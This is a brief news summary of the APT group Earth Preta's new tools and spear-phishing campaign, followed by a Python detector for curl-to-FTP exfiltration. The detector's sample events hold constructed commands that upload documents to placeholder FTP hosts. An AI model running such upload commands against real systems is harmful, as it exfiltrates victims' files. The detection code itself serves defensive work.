Earth Preta Hackers: Equipped With New Arsenal Tools

September 11, 2024



TLDR:

Earth Preta (Mustang Panda), a sophisticated Chinese APT group, has added new tools to its cyberattack arsenal, including the HIUPAN worm and PUBLOAD malware. The group now targets government entities in the Asia-Pacific region using spear-phishing tactics. The multi-stage attack includes tools like FDMTP and PTSOCKET, and uses exfiltration methods like cURL to FTP sites. The group's evolving tactics and evasion techniques pose a significant threat.

Earth Preta Hackers Added New Tools To Their Arsenal

Earth Preta, also known as Mustang Panda, Bronze President, RedDelta, and Red Lich, is a Chinese APT group that targets government entities globally, with a focus on the Asia-Pacific region. Recently, the group has added new tools to its cyberattack strategy, including the HIUPAN worm, which disseminates PUBLOAD malware through removable drives. The group uses tools like FDMTP for malware downloading and PTSOCKET for exfiltration. Their campaign begins with spear-phishing emails carrying .url attachments that trigger a multi-stage malware deployment process. The attacks target specific files with extensions like .doc, .xls, and .pdf. Earth Preta's evolving tactics and sophisticated evasion techniques pose a significant threat to various sectors.
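A detection example for the cURL-to-FTP exfiltration step mentioned above, added here and not taken from the article or from any vendor report: it flags curl upload commands aimed at FTP URLs in process command lines and raises severity when the uploaded file has one of the targeted document extensions. The event list, host names and `.invalid` destinations are constructed, and the `.docx`/`.xlsx` extensions are assumptions beyond the three the article names.

```python
import re
import shlex

# .doc/.xls/.pdf come from the article; .docx/.xlsx are added assumptions.
TARGET_EXTS = {".doc", ".xls", ".pdf", ".docx", ".xlsx"}
FTP_URL = re.compile(r"^ftps?://", re.IGNORECASE)

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1]

def ext_of(path):
    name = basename(path)
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""

def classify(cmdline):
    """Return a finding dict for a curl upload to an FTP URL, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                            # unbalanced quotes
        argv = cmdline.split()
    argv = [a.strip('"') for a in argv]
    if not argv or basename(argv[0]).lower() not in ("curl", "curl.exe"):
        return None
    uploads = []
    for i, arg in enumerate(argv[1:], start=1):
        # curl accepts "-T file", "-Tfile" and "--upload-file file";
        # clustered short flags (e.g. "-sT") are not handled here.
        if arg in ("-T", "--upload-file") and i + 1 < len(argv):
            uploads.append(argv[i + 1])
        elif arg.startswith("-T") and len(arg) > 2:
            uploads.append(arg[2:])
    dests = [a for a in argv[1:] if FTP_URL.match(a)]
    if not uploads or not dests:
        return None
    docs = [u for u in uploads if ext_of(u) in TARGET_EXTS]
    return {"dest": dests[0], "files": uploads,
            "severity": "high" if docs else "medium"}

# Constructed process-creation events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("ws-01", r'curl.exe -T "C:\ProgramData\stage\q3 report.pdf" ftp://files.example.invalid/in/'),
    ("ws-02", r"C:\Windows\System32\curl.exe --upload-file C:\Temp\notes.txt ftp://files.example.invalid/"),
    ("ws-03", "curl https://example.invalid/index.html -o page.html"),
    ("ws-04", "curl -T budget.xls https://example.invalid/put"),
]

def scan(events):
    return [(h, f) for h, c in events if (f := classify(c))]
```

Calling `scan(SAMPLE_EVENTS)` returns findings for ws-01 (high) and ws-02 (medium); the download and the HTTPS upload are not flagged.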

